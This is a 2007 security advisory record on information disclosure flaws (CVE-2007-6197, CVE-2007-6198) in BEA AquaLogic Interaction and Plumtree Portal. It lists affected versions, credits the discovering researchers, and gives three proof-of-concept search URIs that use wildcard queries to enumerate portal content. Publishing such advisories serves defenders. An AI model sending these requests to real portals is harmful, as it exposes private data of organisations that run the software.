Title BEA AquaLogic Interaction Plumtree Portal Multiple Information Disclosure Vulnerabilities
Published 2007-11-28-12:00AM
Updated 2007-12-05-04:52PM
Class Design Error
CVE   CVE-2007-6197, CVE-2007-6198
Remote  Yes
Local  No
Credit  Adrian Pastor <adrian.pastor [at] procheckup.com> and Jan Fry <jan.fry [at] procheckup.com> from ProCheckUp Ltd are credited with the discovery of these issues.
Vulnerable  BEA Systems Plumtree Foundation 5.0.4
BEA Systems Plumtree Foundation 5.0.3
BEA Systems Plumtree Foundation 5.0.2
BEA Systems Plumtree Foundation 6.0 SP1
BEA Systems Plumtree Foundation 6.0
BEA Systems AquaLogic Interaction 6.1 MP1
BEA Systems AquaLogic Interaction 6.0
Not Vulnerable  
Code  Attackers can exploit these issues via a browser. The following proof-of-concept URIs are available:
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 21:30:33 +0000
